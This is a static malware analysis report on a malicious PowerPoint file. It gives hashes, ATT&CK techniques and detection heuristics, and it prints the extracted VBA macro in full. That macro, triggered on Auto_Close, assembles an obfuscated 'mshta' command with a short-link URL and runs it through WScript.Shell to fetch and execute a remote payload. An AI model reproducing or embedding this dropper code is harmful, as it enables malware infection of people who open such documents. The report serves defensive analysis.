Malicious Office (OLE) / .PPT — malware analysis report

Static analysis result for SHA-256 5dc9ba74b7b8bd27…

MALICIOUS

Office (OLE) / .PPT

84.0 KB Created: 2020-08-04 21:46:59 Authoring application: Microsoft Office PowerPoint First seen: 2026-05-13
MD5: ff161c729216430a9bcf7ff2e0bd19b4 SHA-1: 3a86dfeff7bf3aeb0da5cc123fef01ebff9762d1 SHA-256: 5dc9ba74b7b8bd27e3249b426b022e1bb924497b4549679603a5ae6403c204e9
108 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a PowerPoint file containing VBA macros. The Auto_Close macro triggers the execution of a function that constructs the string 'mshta ' and concatenates it with a URL, 'http:// @j.mp/asasdasdasdasdasdasddkaos'. This string is then passed to CreateObject('WScript.Shell').Exec, indicating the intent to download and execute a second-stage payload from the provided URL using mshta.exe.

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject(hireme).Exec suckmydickfornoreason10 + suckmydickfornoreason11
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Auto_CloSe()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1602 bytes
SHA-256: 7b809900ed7466d9dd20072424aa5b08e88724eda0a2b53a37d3f4b101e34a0b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ab1"
Function suckmydickfornoreason11()
suckmydickfornoreason6 = "h"
suckmydickfornoreason7 = "t"
suckmydickfornoreason8 = "t"
suckmydickfornoreason9 = "p://%20%20@j.mp/asasdasddasdasdasdasdasddkaos"
antivirusarescam_6 = suckmydickfornoreason6
antivirusarescam_7 = suckmydickfornoreason7
antivirusarescam_8 = suckmydickfornoreason8
antivirusarescam_9 = suckmydickfornoreason9

suckmydickfornoreason11 = antivirusarescam_6 + antivirusarescam_7 + antivirusarescam_8 + antivirusarescam_9
End Function




Attribute VB_Name = "main"
Sub _
Auto_CloSe()
yari
End Sub

Attribute VB_Name = "ab2"
Function suckmydickfornoreason10()
suckmydickfornoreason1 = "m"
suckmydickfornoreason2 = "s"
suckmydickfornoreason3 = "h"
suckmydickfornoreason4 = "t"
suckmydickfornoreason5 = "a "
antivirusarescam_1 = suckmydickfornoreason1
antivirusarescam_2 = suckmydickfornoreason2
antivirusarescam_3 = suckmydickfornoreason3
antivirusarescam_4 = suckmydickfornoreason4
antivirusarescam_5 = suckmydickfornoreason5


suckmydickfornoreason10 = antivirusarescam_1 + antivirusarescam_2 + antivirusarescam_3 + antivirusarescam_4 + antivirusarescam_5

End Function



Attribute VB_Name = "po1"
Function hireme()
thisis = "WScr"
your = "ipt."
fucking = "She"
security = "ll"
iamhere = thisis
totellyou = your
yoursecurity = fucking
sucks = security
hireme = iamhere + totellyou + yoursecurity + sucks
End Function





Attribute VB_Name = "final"
Function yari()
CreateObject(hireme).Exec suckmydickfornoreason10 + suckmydickfornoreason11
End Function